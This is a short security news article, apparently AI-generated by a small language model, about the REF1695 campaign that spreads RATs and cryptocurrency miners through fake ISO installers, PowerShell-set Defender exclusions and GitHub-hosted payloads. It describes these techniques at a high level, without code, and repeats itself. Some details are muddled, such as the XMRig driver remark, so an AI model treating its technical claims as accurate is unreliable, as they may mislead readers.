Ethical Hacking News
A new threat actor known as REF1695 has been using fake installers to deploy remote access trojans (RATs) and cryptocurrency miners, exploiting vulnerabilities in Windows operating systems. The malicious operation was recently identified by Elastic Security Labs researchers and has significant implications for organizations and individuals who rely on Windows. To mitigate these risks, it is essential to implement robust security measures, including regular updates, patching of vulnerable software, and the use of reputable antivirus software.
The REF1695 threat actor has been using fake installers to deploy remote access trojans (RATs) and cryptocurrency miners since November 2023. The threat actor leverages Windows operating system's ISO file format to spread its malware, evading detection and exploiting vulnerabilities. The fake installers mimic legitimate software applications, making it difficult for users to distinguish between genuine and malicious software. The threat actor uses PowerShell to bypass Microsoft Defender SmartScreen protections and launch malware in the background. The attack has yielded $9,392 across four tracked wallets, indicating consistent financial returns to the attacker. The REF1695 threat actor also abuses GitHub as a payload delivery CDN, hosting staged binaries across two identified accounts. Implementing robust security measures, including regular updates and reputable antivirus software, is essential to mitigate these risks.
Researchers have uncovered a sophisticated threat actor known as REF1695 that has been using fake installers to deploy remote access trojans (RATs) and cryptocurrency miners since November 2023. The malicious operation, which leverages the Windows operating system's ISO file format to spread its malware, was recently identified by Elastic Security Labs researchers Jia Yu Chan, Cyril François, and Remco Sprooten.
According to the researchers, the threat actor has been using various techniques to evade detection and exploit vulnerabilities in the Windows operating system. One of the most notable methods used is the abuse of legitimate software installers as a means of distributing its malware. The fake installers are designed to mimic those of legitimate software applications, making it difficult for users to distinguish between genuine and malicious software.
The threat actor also utilizes PowerShell, a powerful scripting language used by Windows administrators to automate tasks and manage system settings, to bypass Microsoft Defender SmartScreen protections against running unrecognized applications. By using an ISO file as the infection vector, the malware can invoke PowerShell, which is responsible for configuring broad Microsoft Defender Antivirus exclusions, thereby allowing the loader to launch in the background.
Furthermore, the threat actor has been observed leveraging similar tactics to deploy PureRAT, PureMiner, and a bespoke .NET-based XMRig loader. The latter of these loaders reaches out to a hard-coded URL to extract the mining configuration and launch the miner payload. This tactic is particularly effective because it allows the threat actor to fine-tune the CPU for mining operations using the "Winring0x64.sys" driver.
Another notable component of the attack is a watchdog process that ensures the malicious artifacts and persistence mechanisms are restored in the event they are deleted. The campaign is estimated to have accrued $9,392 across four tracked wallets, indicating that the operation is yielding consistent financial returns to the attacker.
The threat actor also abuses GitHub as a payload delivery CDN, hosting staged binaries across two identified accounts. This technique shifts the download-and-execute step away from operator-controlled infrastructure to a trusted platform, reducing detection friction.
In addition to its use of PowerShell and GitHub, the REF1695 threat actor has been observed in many cryptojacking campaigns over the years, exploiting vulnerabilities in legitimate software drivers. The functionality was added to XMRig miners in December 2019.
The attack has significant implications for organizations and individuals who rely on Windows operating systems and are susceptible to phishing attacks. To mitigate these risks, it is essential to implement robust security measures, including regular updates, patching of vulnerable software, and the use of reputable antivirus software. Individuals should also be cautious when downloading software from untrusted sources or clicking on suspicious links.
In conclusion, the REF1695 threat actor represents a sophisticated example of malware deployment using fake installers and exploitation of vulnerabilities in Windows operating systems. Its tactics and techniques highlight the importance of staying informed about emerging threats and implementing robust security measures to protect against such attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/RATs-Crypto-Miners-and-ISO-Lures-A-Sophisticated-Threat-Actor-Exploits-Vulnerabilities-to-Spread-Malware-ehn.shtml
https://thehackernews.com/2026/04/researchers-uncover-mining-operation.html
https://malwaretips.com/threads/researchers-uncover-mining-operation-using-iso-lures-to-spread-rats-and-crypto-miners.140686/
Published: Thu Apr 2 08:25:52 2026 by llama3.2 3B Q4_K_M
